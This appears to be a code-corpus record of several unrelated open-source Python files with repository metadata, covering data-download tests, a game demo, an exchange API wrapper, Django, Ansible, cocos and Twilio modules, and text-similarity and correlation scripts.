#------------------------------------------------------------------------------ # Test utility functions #------------------------------------------------------------------------------ @responses.activate def test_check_md5_of_url(tempdir, mock_url): output_path = op.join(tempdir, 'data') download_file(_URL, output_path) assert _check_md5_of_url(output_path, _URL) #------------------------------------------------------------------------------ # Test download functions #------------------------------------------------------------------------------ @responses.activate def test_download_not_found(tempdir): path = op.join(tempdir, 'test') with raises(Exception): download_file(_URL + '_notfound', path) @responses.activate def test_download_already_exists_invalid(tempdir, mock_url): logger = StringLogger(level='debug') register(logger) path = op.join(tempdir, 'test') # Create empty file. open(path, 'a').close() _check(_dl(path)) assert 'redownload' in str(logger) @responses.activate def test_download_already_exists_valid(tempdir, mock_url): logger = StringLogger(level='debug') register(logger) path = op.join(tempdir, 'test') # Create valid file. 
with open(path, 'ab') as f: f.write(_DATA.tostring()) _check(_dl(path)) assert 'skip' in str(logger) @responses.activate def test_download_file(tempdir, mock_urls): path = op.join(tempdir, 'test') param, url_data, url_checksum = mock_urls data_here, data_valid, checksum_here, checksum_valid = param assert_succeeds = (data_here and data_valid and ((checksum_here == checksum_valid) or (not(checksum_here) and checksum_valid))) download_succeeds = (assert_succeeds or (data_here and (not(data_valid) and not(checksum_here)))) if download_succeeds: data = _dl(path) else: with raises(Exception): data = _dl(path) if assert_succeeds: _check(data) @responses.activate def test_download_sample_data(tempdir): name = 'hybrid_10sec.dat' url = _BASE_URL['cortexlab'] + name _add_mock_response(url, _DATA.tostring()) _add_mock_response(url + '.md5', _CHECKSUM) download_sample_data(name, tempdir) with open(op.join(tempdir, name), 'rb') as f: data = f.read() ae(np.fromstring(data, np.float32), _DATA) responses.reset() @responses.activate def test_dat_file(tempdir): data = np.random.randint(size=(20000, 4), low=-100, high=100).astype(np.int16) fn = 'test-4ch-1s.dat' _add_mock_response(_BASE_URL['github'] + 'test/' + fn, data.tostring()) path = download_test_data(fn, tempdir) with open(path, 'rb') as f: arr = np.fromfile(f, dtype=np.int16).reshape((-1, 4)) assert arr.shape == (20000, 4) responses.reset()
nsteinme/phy
phy/utils/tests/test_datasets.py
Python
bsd-3-clause
5,446
from pydojo import * # CREATE GAME DISPLAY screen(1600, 900) turtle = Actor() turtle.hide() turtles = [] time = 0 # MAIN LOOP while True: clear() if ticks() - time > 100: t = clone(turtle) t.point(random.randint(-180, 180)) t.tag('turtle') t.speed = random.randint(1, 10) t.pendown() turtles.append(t) time = ticks() for t in getactors('turtle'): t.changepencolor(random.randint(1, 100)) t.forward(t.speed) t.bounce() t.setdirection(random.randint(t.direction - 10, t.direction + 10)) if t.collide('turtle'): t.point(random.randint(-180, 180)) # UPDATE SCREEN update()
sprintingkiwi/PYDOJO
example_random_art.py
Python
mit
705
from poloniex import Poloniex as Client from .Config import Config from .Logger import Logger from .ExchangeException import ExchangeException class Poloniex: def __init__(self, key, secret): self.logger = Logger(__name__) try: self.client = Client(key, secret) except Exception as e: self.logger.log(e) raise ExchangeException(self.__class__.__name__, e) def getBalances(self): try: result = self.client.returnBalances() balances = {} for currency in result: name = currency.upper() value = float(result[currency]) if value > Config.BALANCE_ZERO: balances[name] = value return balances except Exception as e: self.logger.log(e) raise ExchangeException(self.__class__.__name__, e)
msantl/cryptofolio
cryptofolio/api/Poloniex.py
Python
gpl-3.0
913
import unittest.mock as mock from django.conf import settings from django.test.utils import override_settings from test_plus import TestCase from badges.models import Badge from .factories import UserFactory, GroupFactory @override_settings(MINIMUM_YEAR_FOR_PIONNEER_BADGE=1) class TestPionneerBadge(TestCase): BADGE_LEVEL = settings.BADGE_LEVEL.BADGE_PIONNEER.value def setUp(self): self.group = GroupFactory.create(name=settings.DESIGNER_GROUP_NAME) def test_designer_recent_joined_badge(self): designer = UserFactory.create(groups=[self.group, ]) counter = Badge.objects.filter(user=designer, level=self.BADGE_LEVEL).count() self.assertEqual(counter, 0) def test_designer_date_joined_since_one_year(self): with mock.patch("studio.users.meta_badges.compute_age", return_value=1): designer = UserFactory.create(groups=[self.group, ]) counter = Badge.objects.filter(user=designer, level=self.BADGE_LEVEL).count() self.assertEqual(counter, 1) def test_designer_date_joined_since_more_one_year(self): with mock.patch("studio.users.meta_badges.compute_age", return_value=5): designer = UserFactory.create(groups=[self.group, ]) counter = Badge.objects.filter(user=designer, level=self.BADGE_LEVEL).count() self.assertEqual(counter, 1) def test_designer_date_joined_since_one_year_immutable(self): with mock.patch("studio.users.meta_badges.compute_age", return_value=1): designer = UserFactory.create(groups=[self.group, ]) counter = Badge.objects.filter(user=designer, level=self.BADGE_LEVEL).count() self.assertEqual(counter, 1) with mock.patch("studio.users.meta_badges.compute_age", return_value=1): designer.last_name = 'test_name' designer.save() counter = Badge.objects.filter(user=designer, level=self.BADGE_LEVEL).count() self.assertEqual(counter, 1) with mock.patch("studio.users.meta_badges.compute_age", return_value=4): designer.first_name = 'test_name' designer.save() counter = Badge.objects.filter(user=designer, level=self.BADGE_LEVEL).count() self.assertEqual(counter, 1)
moas/sketchbadges
exo/studio/users/tests/test_pionneer_badge.py
Python
mit
2,298
#!/usr/bin/python
#
# (c) 2017 Apstra Inc, <[email protected]>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
ANSIBLE_METADATA = {'metadata_version': '1.1',
                    'status': ['preview'],
                    'supported_by': 'community'}

DOCUMENTATION = '''
---
module: aos_rack_type
author: Damien Garros (@dgarros)
version_added: "2.3"
short_description: Manage AOS Rack Type
description:
  - Apstra AOS Rack Type module lets you manage your Rack Type easily. You can
    create and delete Rack Type by Name, ID or by using a JSON File. This module
    is idempotent and supports the I(check) mode. It uses the AOS REST API.
requirements:
  - "aos-pyez >= 0.6.0"
options:
  session:
    description:
      - An existing AOS session as obtained by M(aos_login) module.
    required: true
  name:
    description:
      - Name of the Rack Type to manage.
        Only one of I(name), I(id) or I(content) can be set.
  id:
    description:
      - AOS Id of the Rack Type to manage (can't be used to create a new Rack Type),
        Only one of I(name), I(id) or I(content) can be set.
  content:
    description:
      - Datastructure of the Rack Type to create. The data can be in YAML / JSON or
        directly a variable. It's the same datastructure that is returned
        on success in I(value).
  state:
    description:
      - Indicate what is the expected state of the Rack Type (present or not).
default: present choices: ['present', 'absent'] ''' EXAMPLES = ''' - name: "Delete a Rack Type by name" aos_rack_type: session: "{{ aos_session }}" name: "my-rack-type" state: absent - name: "Delete a Rack Type by id" aos_rack_type: session: "{{ aos_session }}" id: "45ab26fc-c2ed-4307-b330-0870488fa13e" state: absent # Save a Rack Type to a file - name: "Access Rack Type 1/3" aos_rack_type: session: "{{ aos_session }}" name: "my-rack-type" state: present register: rack_type - name: "Save Rack Type into a JSON file 2/3" copy: content: "{{ rack_type.value | to_nice_json }}" dest: rack_type_saved.json - name: "Save Rack Type into a YAML file 3/3" copy: content: "{{ rack_type.value | to_nice_yaml }}" dest: rack_type_saved.yaml - name: "Load Rack Type from a JSON file" aos_rack_type: session: "{{ aos_session }}" content: "{{ lookup('file', 'resources/rack_type_saved.json') }}" state: present - name: "Load Rack Type from a YAML file" aos_rack_type: session: "{{ aos_session }}" content: "{{ lookup('file', 'resources/rack_type_saved.yaml') }}" state: present ''' RETURNS = ''' name: description: Name of the Rack Type returned: always type: str sample: AOS-1x25-1 id: description: AOS unique ID assigned to the Rack Type returned: always type: str sample: fcc4ac1c-e249-4fe7-b458-2138bfb44c06 value: description: Value of the object as returned by the AOS Server returned: always type: dict sample: {'...'} ''' import json from ansible.module_utils.basic import AnsibleModule from ansible.module_utils.network.aos.aos import get_aos_session, find_collection_item, do_load_resource, check_aos_version, content_to_dict ######################################################### # State Processing ######################################################### def rack_type_absent(module, aos, my_rack_type): margs = module.params # If the module do not exist, return directly if my_rack_type.exists is False: module.exit_json(changed=False, name=margs['name'], id=margs['id'], value={}) # If not in check mode, delete Rack Type if not module.check_mode: try: my_rack_type.delete() except: module.fail_json(msg="An error occurred, while trying to delete the Rack Type") module.exit_json( changed=True, name=my_rack_type.name, id=my_rack_type.id, value={} ) def rack_type_present(module, aos, my_rack_type): margs = module.params if margs['content'] is not None: if 'display_name' in module.params['content'].keys(): do_load_resource(module, aos.RackTypes, module.params['content']['display_name']) else: module.fail_json(msg="Unable to find display_name in 'content', Mandatory") # if rack_type doesn't exist already, create a new one if my_rack_type.exists is False and 'content' not in margs.keys(): module.fail_json(msg="'content' is mandatory for module that don't exist currently") module.exit_json( changed=False, name=my_rack_type.name, id=my_rack_type.id, value=my_rack_type.value ) ######################################################### # Main Function ######################################################### def rack_type(module): margs = module.params try: aos = get_aos_session(module, margs['session']) except: module.fail_json(msg="Unable to login to the AOS server") item_name = False item_id = False if margs['content'] is not None: content = content_to_dict(module, margs['content'] ) if 'display_name' in content.keys(): item_name = content['display_name'] else: module.fail_json(msg="Unable to extract 'display_name' from 'content'") elif margs['name'] is not None: item_name = margs['name'] elif margs['id'] is not None: item_id 
= margs['id'] #---------------------------------------------------- # Find Object if available based on ID or Name #---------------------------------------------------- my_rack_type = find_collection_item(aos.RackTypes, item_name=item_name, item_id=item_id) #---------------------------------------------------- # Proceed based on State value #---------------------------------------------------- if margs['state'] == 'absent': rack_type_absent(module, aos, my_rack_type) elif margs['state'] == 'present': rack_type_present(module, aos, my_rack_type) def main(): module = AnsibleModule( argument_spec=dict( session=dict(required=True, type="dict"), name=dict(required=False ), id=dict(required=False ), content=dict(required=False, type="json"), state=dict( required=False, choices=['present', 'absent'], default="present") ), mutually_exclusive = [('name', 'id', 'content')], required_one_of=[('name', 'id', 'content')], supports_check_mode=True ) # Check if aos-pyez is present and match the minimum version check_aos_version(module, '0.6.0') rack_type(module) if __name__ == "__main__": main()
kbrebanov/ansible
lib/ansible/modules/network/aos/aos_rack_type.py
Python
gpl-3.0
7,629
# reload seems to work for Python 2.3 but not 2.2. import time, os, sys import test_pyximport # debugging the 2.2 problem if 1: from distutils import sysconfig try: sysconfig.set_python_build() except AttributeError: pass import pyxbuild print pyxbuild.distutils.sysconfig == sysconfig def test(): tempdir = test_pyximport.make_tempdir() sys.path.append(tempdir) hello_file = os.path.join(tempdir, "hello.pyx") open(hello_file, "w").write("x = 1; print x; before = 'before'\n") import hello assert hello.x == 1 time.sleep(1) # sleep to make sure that new "hello.pyx" has later # timestamp than object file. open(hello_file, "w").write("x = 2; print x; after = 'after'\n") reload(hello) assert hello.x == 2, "Reload should work on Python 2.3 but not 2.2" test_pyximport.remove_tempdir(tempdir) if __name__=="__main__": test()
Teamxrtc/webrtc-streaming-node
third_party/webrtc/src/chromium/src/third_party/cython/src/pyximport/test/test_reload.py
Python
mit
934
from __future__ import division, print_function, unicode_literals # important: set cocos_utest=1 in the environment before run. # that simplifies the pyglet mockup needed # remember to erase or set to zero for normal runs import os assert os.environ['cocos_utest'] # set the desired pyglet mockup import sys sys.path.insert(0,'pyglet_mockup1') import pyglet assert pyglet.mock_level == 1 import cocos from cocos.director import director from cocos.cocosnode import CocosNode import cocos.actions as ac import sys director.init() rec = [] next_done=0 #bitflags class UAction(ac.Action): ##use actions names 1, 2 or '1', '2' ; then you instruct the .step method ##to set ._done using the global next_done def init(self, name): rec.append((name, 'init')) self.name = name def start(self): rec.append((self.name, 'start')) def step(self, dt): global rec, next_done rec.append((self.name, 'step', dt)) if int(self.name) & next_done: print('setting %s _done to True'%self.name) self._done = True def stop(self): rec.append((self.name, 'stop')) ## def done(self): ## rec.append((self.name, 'done', class UIntervalAction(ac.IntervalAction): def init(self, name, duration): rec.append((name, 'init')) self.duration = duration self.name = name def start(self): rec.append((self.name, 'start')) def step(self, dt): rec.append((self.name, 'step', dt)) super(UIntervalAction, self).step(dt) def update(self, fraction): rec.append((self.name, 'update', fraction)) def stop(self): rec.append((self.name, 'stop')) ## def done(self): ## rec.append((self.name, 'done', class Test_sequence: """ """ def test_InstantAction_duration0_action(self): global rec node = CocosNode() name1 = '1' name2 = '2' duration1 = 0.0 a = UIntervalAction(name1, duration1) b = UAction(name2) composite = a + b rec = [] worker = node.do(composite) dt = 0.1 node._step(dt) print(rec) assert rec[0] == (name1, 'start') assert rec[1] == (name1, 'step', dt) assert rec[2] == (name1, 'update', 1.0) assert rec[3] == (name1, 'stop') assert rec[4] == (name2, 'start') rec = [] node._step(dt) for e in rec: assert e[0]==name2
vyscond/cocos
utest/test_p_ba_operands_different_classes.py
Python
bsd-3-clause
2,493
import sys import os import pandas as pd import multiprocessing as mp import csv # this code is written for the merged file with combined pval & fdr. although it could have been written for the file without comb fisher and fdr, # it is easier to have the output with the comb pval and fdr and use what we need rather than have to search them in the merged file with comb pval and fdr # or run the next (create network) command to calc the combined pval and fdr. # cd /nfs3/PHARM/Morgun_Lab/richrr/Cervical_Cancer/analysis/merged/corr/gexpress/stage-ltest_corr/p1 """ SGE_Batch -c "python ~/Morgun_Lab/richrr/scripts/python/merging-python-script.py merged_gexp_sp_corr_p1_FolChMedian_merged-parallel-output.csv-comb-pval-output.csv 1 2" -m 150G -F 100G -r log_merge-py_1 -q biomed -M [email protected] -P 8 SGE_Batch -c "python ~/Morgun_Lab/richrr/scripts/python/merging-python-script.py merged_gexp_sp_corr_p1_FolChMedian_merged-parallel-output.csv-comb-pval-output.csv 2 2" -m 150G -F 100G -r log_merge-py_2 -q biomed -M [email protected] -P 8 SGE_Batch -c "python ~/Morgun_Lab/richrr/scripts/python/merging-python-script.py merged_gexp_sp_corr_p1_FolChMedian_merged-parallel-output.csv-comb-pval-output.csv 3 2" -m 150G -F 100G -r log_merge-py_3 -q biomed -M [email protected] -P 8 SGE_Batch -c "python ~/Morgun_Lab/richrr/scripts/python/merging-python-script.py merged_gexp_sp_corr_p1_FolChMedian_merged-parallel-output.csv-comb-pval-output.csv 4 2" -m 150G -F 100G -r log_merge-py_4 -q biomed -M [email protected] -P 8 """ infile = sys.argv[1] analysis = "Analys " + sys.argv[2] + " " numb_datasets = int(sys.argv[3]) # get the header line form the big file and decide which (analysis) columns to use header_line = '' with open(infile, 'r') as f: header_line = f.readline().strip() selcted_cols = [i for i, s in enumerate(header_line.split(',')) if analysis in s] #[s for s in header_line.split(',') if analysis in s] # get the lowest and highest and make range out of it # this way you get the combinedpval and combined fdr cols selcted_cols = range(min(selcted_cols), max(selcted_cols)+1) selcted_cols.insert(0, 0) # explicitly adding the row id cols print selcted_cols header_for_print = [header_line.split(',')[i] for i in selcted_cols] print header_for_print def process(df): res = list() for row in df.itertuples(): #print row corrs = row[1:numb_datasets+1] corrs_flag = 0 # write some condition to check for NA pos = sum(float(num) > 0 for num in corrs) neg = sum(float(num) < 0 for num in corrs) #print pos, neg if len(corrs) == pos and not len(corrs) == neg: #print "pos" corrs_flag = 1 if len(corrs) == neg and not len(corrs) == pos: #print "neg" corrs_flag = 1 if corrs_flag == 1: res.append(row) return res counter=0 pool = mp.Pool(30) # use 30 processes funclist = [] # http://gouthamanbalaraman.com/blog/distributed-processing-pandas.html #for chunck_df in pd.read_csv(infile, chunksize=100, usecols=range(5), index_col=0): for chunck_df in pd.read_csv(infile, chunksize=100000, usecols=selcted_cols, index_col=0): counter = counter + 1 print counter #print chunck_df # process each data frame f = pool.apply_async(process,[chunck_df]) funclist.append(f) #result = list() OUTfile = infile + analysis.replace(" ", "_") + '-same-dir-corrs.csv' with open(OUTfile, 'w') as of: writer = csv.writer(of, delimiter=',', lineterminator='\n') writer.writerow(header_for_print) for f in funclist: csvd = f.get(timeout=10000) # timeout in 10000 seconds #result.extend(csvd) writer.writerows(csvd) #print result # quick and dirty command to get the 
first column of the file: cutcmd = "cut -d, -f 1 " + OUTfile + " > " + OUTfile + "-ids.csv" os.system(cutcmd) print "Done" """ # sequential corrs_dict = dict() # satisfies corr direction counter = 0 # with open(in_filename) as in_f, open(out_filename, 'w') as out_f with open(infile) as f: for line in f: counter = counter + 1 line = line.strip() print line contents = line.split(",") corrs = contents[1:numb_datasets+1] corrs_flag = 0 if counter == 1: # move to next iteration of.write(line) continue # write some condition to check for NA pos = sum(float(num) > 0 for num in corrs) neg = sum(float(num) < 0 for num in corrs) #print pos, neg if len(corrs) == pos and not len(corrs) == neg: print "pos" corrs_flag = 1 if len(corrs) == neg and not len(corrs) == pos: print "neg" corrs_flag = 1 if corrs_flag == 1: corrs_dict[contents[0]] = contents[1:] ''' if corrs_flag == 0: # no point in analyzing pvals, move to next iteration continue pvals = contents[numb_datasets+1:] print pvals pvals_flag = 0 # write some condition to check for NA sig = sum(float(num) < 1 for num in pvals) #print sig if len(corrs) == sig: print "sig" pvals_flag = 1 if corrs_flag == 1 and pvals_flag == 1: corrs_dict[contents[0]] = contents[1:] if counter == 5: sys.exit(0) ''' print corrs_dict """
richrr/scripts
python/merging-python-script.py
Python
gpl-3.0
5,595
# encoding=utf-8 from __future__ import division import os import sys import chardet import jieba import jieba.posseg as pseg import jieba.analyse import HTMLParser reload(sys) sys.setdefaultencoding('utf-8') html_parser = HTMLParser.HTMLParser() jieba.analyse.set_stop_words("./stop_words.txt") corpus_file_name = './corpus.dat' def transfer_text(path): files = [] for path_, subdirs_, files_ in os.walk(path): for file in files_: if 'txt' in file: files.append(path_ + "/" + file) text_file_handle = open(corpus_file_name,'w') for input_name in files: lines = open(input_name,"r") for line in lines: if 0 != len(line.strip()): try: text_buf = filter_text(line.decode('cp936'),input_name) if len(text_buf) > 0: text_file_handle.write(" ".join(text_buf)) text_file_handle.write("\n"); except Exception as err: continue lines.close() text_file_handle.close() def filter_text(buf,file_name): # get rid of html escape character buf = html_parser.unescape(buf) buf = buf.strip() buf = jieba.analyse.extract_tags(buf) buf = " ".join(buf) words = pseg.cut(buf) part_of_speech = ['x','d','b','m','u','t','uj','ul','c','p'] part_of_speech = ['n','v','vn'] texts = [] for word, flag in words: if flag not in part_of_speech: continue texts.append(word) return texts from gensim import corpora,models,similarities from pprint import pprint import logging logging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO) class my_corpus(object): def __init__(self,file_name): self.file_name = file_name def __iter__(self): for line in open(self.file_name): yield line.split() def query_sims(corpus_file_name = 'test/gensim_tutorial/mycorpus.txt',query = "System and human",top_N = 20): texts = [] corpus_data = my_corpus(corpus_file_name) for vec in corpus_data: texts.append(vec) ''' texts's format [['human', 'interface', 'computer'],['survey', 'user', 'computer', 'system', 'response', 'time']] ''' dictionary = corpora.Dictionary(texts) #pprint (dictionary.token2id) corpus = [dictionary.doc2bow(text) for text in texts] tfidf = models.TfidfModel(corpus) corpus_tfidf = tfidf[corpus] ''' for doc in corpus_tfidf: print doc ''' topic_num = top_N lsi = models.LsiModel(corpus_tfidf, id2word=dictionary, num_topics=topic_num) lsi.print_topics(topic_num) corpus_lsi = lsi[corpus_tfidf] ''' for doc in corpus_lsi: print doc ''' print lsi[corpus].__dict__ index = similarities.MatrixSimilarity(lsi[corpus]) query_bow = dictionary.doc2bow(query.lower().split()) query_lsi = lsi[query_bow] sims = index[query_lsi] sort_sims = sorted(enumerate(sims), key=lambda item: -item[1]) return sort_sims[0:10] print query_sims() #transfer_text("./SogouC.reduced/Reduced") #print query_sims(corpus_file_name,"战法 演习 红军 对抗 出难题 心理战 对抗性 低能 打磨 必胜 透 演练 弱者 敌情",20)
yuyunliuhen/automatic-text-categorization
gensim_sims.py
Python
mit
2,959
import re from django.core.validators import EmailValidator, URLValidator from django.db.models.loading import get_model from django.forms import ValidationError from tower import ugettext as _ def validate_twitter(username): """Return a twitter username given '@' or http(s) strings.""" if username: username = re.sub('https?://(www\.)?twitter\.com/|@', '', username) # Twitter accounts must be alphanumeric ASCII including underscore, and <= 15 chars. # https://support.twitter.com/articles/101299-why-can-t-i-register-certain-usernames if len(username) > 15: raise ValidationError(_('Twitter usernames cannot be longer than 15 characters.')) if not re.match('^\w+$', username): raise ValidationError(_('Twitter usernames must contain only alphanumeric' ' characters and the underscore.')) return username def validate_username(username): """Validate username. Import modules here to prevent dependency breaking. """ username = username.lower() UsernameBlacklist = get_model('users', 'UsernameBlacklist') if UsernameBlacklist.objects.filter(value=username, is_regex=False).exists(): return False for regex_value in UsernameBlacklist.objects.filter(is_regex=True): if re.match(regex_value.value, username): return False return True def validate_website(url): """Validate and return a properly formatted website url.""" validate_url = URLValidator() if url and '://' not in url: url = u'http://%s' % url try: validate_url(url) except ValidationError: raise ValidationError(_('Enter a valid URL.')) return url def validate_username_not_url(username): """Validate that a username is not a URL.""" if username.startswith('http://') or username.startswith('https://'): raise ValidationError(_('This field requires an identifier, not a URL.')) return username def validate_email(value): """Validate that a username is email like.""" _validate_email = EmailValidator() try: _validate_email(value) except ValidationError: raise ValidationError(_('Enter a valid email address.')) return value def validate_phone_number(value): """Validate that a phone number is in international format. (5-15 characters).""" value = value.replace(' ', '') value = re.sub(r'^00', '+', value) # Ensure that there are 5 to 15 digits pattern = re.compile(r'^\+\d{5,15}$') if not pattern.match(value): raise ValidationError(_('Please enter a valid phone number in international format ' '(e.g. +1 555 555 5555)')) return value
chirilo/mozillians
mozillians/phonebook/validators.py
Python
bsd-3-clause
2,774
# -*- coding: utf-8 -*- from __future__ import unicode_literals from django.db import models, migrations class Migration(migrations.Migration): dependencies = [ ('core', '0012_auto_20150508_0958'), ] operations = [ migrations.RemoveField( model_name='generalledgeraccount', name='meta', ), migrations.RemoveField( model_name='generalledgerentry', name='meta', ), ]
AjabWorld/ajabsacco
ajabsacco/core/migrations/0013_auto_20150508_1143.py
Python
apache-2.0
474
# coding=utf-8 r""" This code was generated by \ / _ _ _| _ _ | (_)\/(_)(_|\/| |(/_ v1.0.0 / / """ from twilio.base import serialize from twilio.base import values from twilio.base.instance_context import InstanceContext from twilio.base.instance_resource import InstanceResource from twilio.base.list_resource import ListResource from twilio.base.page import Page class TaskQueueStatisticsList(ListResource): def __init__(self, version, workspace_sid, task_queue_sid): """ Initialize the TaskQueueStatisticsList :param Version version: Version that contains the resource :param workspace_sid: The SID of the Workspace that contains the TaskQueue :param task_queue_sid: The SID of the TaskQueue from which these statistics were calculated :returns: twilio.rest.taskrouter.v1.workspace.task_queue.task_queue_statistics.TaskQueueStatisticsList :rtype: twilio.rest.taskrouter.v1.workspace.task_queue.task_queue_statistics.TaskQueueStatisticsList """ super(TaskQueueStatisticsList, self).__init__(version) # Path Solution self._solution = {'workspace_sid': workspace_sid, 'task_queue_sid': task_queue_sid, } def get(self): """ Constructs a TaskQueueStatisticsContext :returns: twilio.rest.taskrouter.v1.workspace.task_queue.task_queue_statistics.TaskQueueStatisticsContext :rtype: twilio.rest.taskrouter.v1.workspace.task_queue.task_queue_statistics.TaskQueueStatisticsContext """ return TaskQueueStatisticsContext( self._version, workspace_sid=self._solution['workspace_sid'], task_queue_sid=self._solution['task_queue_sid'], ) def __call__(self): """ Constructs a TaskQueueStatisticsContext :returns: twilio.rest.taskrouter.v1.workspace.task_queue.task_queue_statistics.TaskQueueStatisticsContext :rtype: twilio.rest.taskrouter.v1.workspace.task_queue.task_queue_statistics.TaskQueueStatisticsContext """ return TaskQueueStatisticsContext( self._version, workspace_sid=self._solution['workspace_sid'], task_queue_sid=self._solution['task_queue_sid'], ) def __repr__(self): """ Provide a friendly representation :returns: Machine friendly representation :rtype: str """ return '<Twilio.Taskrouter.V1.TaskQueueStatisticsList>' class TaskQueueStatisticsPage(Page): def __init__(self, version, response, solution): """ Initialize the TaskQueueStatisticsPage :param Version version: Version that contains the resource :param Response response: Response from the API :param workspace_sid: The SID of the Workspace that contains the TaskQueue :param task_queue_sid: The SID of the TaskQueue from which these statistics were calculated :returns: twilio.rest.taskrouter.v1.workspace.task_queue.task_queue_statistics.TaskQueueStatisticsPage :rtype: twilio.rest.taskrouter.v1.workspace.task_queue.task_queue_statistics.TaskQueueStatisticsPage """ super(TaskQueueStatisticsPage, self).__init__(version, response) # Path Solution self._solution = solution def get_instance(self, payload): """ Build an instance of TaskQueueStatisticsInstance :param dict payload: Payload response from the API :returns: twilio.rest.taskrouter.v1.workspace.task_queue.task_queue_statistics.TaskQueueStatisticsInstance :rtype: twilio.rest.taskrouter.v1.workspace.task_queue.task_queue_statistics.TaskQueueStatisticsInstance """ return TaskQueueStatisticsInstance( self._version, payload, workspace_sid=self._solution['workspace_sid'], task_queue_sid=self._solution['task_queue_sid'], ) def __repr__(self): """ Provide a friendly representation :returns: Machine friendly representation :rtype: str """ return '<Twilio.Taskrouter.V1.TaskQueueStatisticsPage>' class 
TaskQueueStatisticsContext(InstanceContext): def __init__(self, version, workspace_sid, task_queue_sid): """ Initialize the TaskQueueStatisticsContext :param Version version: Version that contains the resource :param workspace_sid: The SID of the Workspace with the TaskQueue to fetch :param task_queue_sid: The SID of the TaskQueue for which to fetch statistics :returns: twilio.rest.taskrouter.v1.workspace.task_queue.task_queue_statistics.TaskQueueStatisticsContext :rtype: twilio.rest.taskrouter.v1.workspace.task_queue.task_queue_statistics.TaskQueueStatisticsContext """ super(TaskQueueStatisticsContext, self).__init__(version) # Path Solution self._solution = {'workspace_sid': workspace_sid, 'task_queue_sid': task_queue_sid, } self._uri = '/Workspaces/{workspace_sid}/TaskQueues/{task_queue_sid}/Statistics'.format(**self._solution) def fetch(self, end_date=values.unset, minutes=values.unset, start_date=values.unset, task_channel=values.unset, split_by_wait_time=values.unset): """ Fetch the TaskQueueStatisticsInstance :param datetime end_date: Only calculate statistics from on or before this date :param unicode minutes: Only calculate statistics since this many minutes in the past :param datetime start_date: Only calculate statistics from on or after this date :param unicode task_channel: Only calculate real-time and cumulative statistics for the specified TaskChannel :param unicode split_by_wait_time: A comma separated list of values that describes the thresholds to calculate statistics on :returns: The fetched TaskQueueStatisticsInstance :rtype: twilio.rest.taskrouter.v1.workspace.task_queue.task_queue_statistics.TaskQueueStatisticsInstance """ data = values.of({ 'EndDate': serialize.iso8601_datetime(end_date), 'Minutes': minutes, 'StartDate': serialize.iso8601_datetime(start_date), 'TaskChannel': task_channel, 'SplitByWaitTime': split_by_wait_time, }) payload = self._version.fetch(method='GET', uri=self._uri, params=data, ) return TaskQueueStatisticsInstance( self._version, payload, workspace_sid=self._solution['workspace_sid'], task_queue_sid=self._solution['task_queue_sid'], ) def __repr__(self): """ Provide a friendly representation :returns: Machine friendly representation :rtype: str """ context = ' '.join('{}={}'.format(k, v) for k, v in self._solution.items()) return '<Twilio.Taskrouter.V1.TaskQueueStatisticsContext {}>'.format(context) class TaskQueueStatisticsInstance(InstanceResource): def __init__(self, version, payload, workspace_sid, task_queue_sid): """ Initialize the TaskQueueStatisticsInstance :returns: twilio.rest.taskrouter.v1.workspace.task_queue.task_queue_statistics.TaskQueueStatisticsInstance :rtype: twilio.rest.taskrouter.v1.workspace.task_queue.task_queue_statistics.TaskQueueStatisticsInstance """ super(TaskQueueStatisticsInstance, self).__init__(version) # Marshaled Properties self._properties = { 'account_sid': payload.get('account_sid'), 'cumulative': payload.get('cumulative'), 'realtime': payload.get('realtime'), 'task_queue_sid': payload.get('task_queue_sid'), 'workspace_sid': payload.get('workspace_sid'), 'url': payload.get('url'), } # Context self._context = None self._solution = {'workspace_sid': workspace_sid, 'task_queue_sid': task_queue_sid, } @property def _proxy(self): """ Generate an instance context for the instance, the context is capable of performing various actions. 
All instance actions are proxied to the context :returns: TaskQueueStatisticsContext for this TaskQueueStatisticsInstance :rtype: twilio.rest.taskrouter.v1.workspace.task_queue.task_queue_statistics.TaskQueueStatisticsContext """ if self._context is None: self._context = TaskQueueStatisticsContext( self._version, workspace_sid=self._solution['workspace_sid'], task_queue_sid=self._solution['task_queue_sid'], ) return self._context @property def account_sid(self): """ :returns: The SID of the Account that created the resource :rtype: unicode """ return self._properties['account_sid'] @property def cumulative(self): """ :returns: An object that contains the cumulative statistics for the TaskQueue :rtype: dict """ return self._properties['cumulative'] @property def realtime(self): """ :returns: An object that contains the real-time statistics for the TaskQueue :rtype: dict """ return self._properties['realtime'] @property def task_queue_sid(self): """ :returns: The SID of the TaskQueue from which these statistics were calculated :rtype: unicode """ return self._properties['task_queue_sid'] @property def workspace_sid(self): """ :returns: The SID of the Workspace that contains the TaskQueue :rtype: unicode """ return self._properties['workspace_sid'] @property def url(self): """ :returns: The absolute URL of the TaskQueue statistics resource :rtype: unicode """ return self._properties['url'] def fetch(self, end_date=values.unset, minutes=values.unset, start_date=values.unset, task_channel=values.unset, split_by_wait_time=values.unset): """ Fetch the TaskQueueStatisticsInstance :param datetime end_date: Only calculate statistics from on or before this date :param unicode minutes: Only calculate statistics since this many minutes in the past :param datetime start_date: Only calculate statistics from on or after this date :param unicode task_channel: Only calculate real-time and cumulative statistics for the specified TaskChannel :param unicode split_by_wait_time: A comma separated list of values that describes the thresholds to calculate statistics on :returns: The fetched TaskQueueStatisticsInstance :rtype: twilio.rest.taskrouter.v1.workspace.task_queue.task_queue_statistics.TaskQueueStatisticsInstance """ return self._proxy.fetch( end_date=end_date, minutes=minutes, start_date=start_date, task_channel=task_channel, split_by_wait_time=split_by_wait_time, ) def __repr__(self): """ Provide a friendly representation :returns: Machine friendly representation :rtype: str """ context = ' '.join('{}={}'.format(k, v) for k, v in self._solution.items()) return '<Twilio.Taskrouter.V1.TaskQueueStatisticsInstance {}>'.format(context)
twilio/twilio-python
twilio/rest/taskrouter/v1/workspace/task_queue/task_queue_statistics.py
Python
mit
11,519
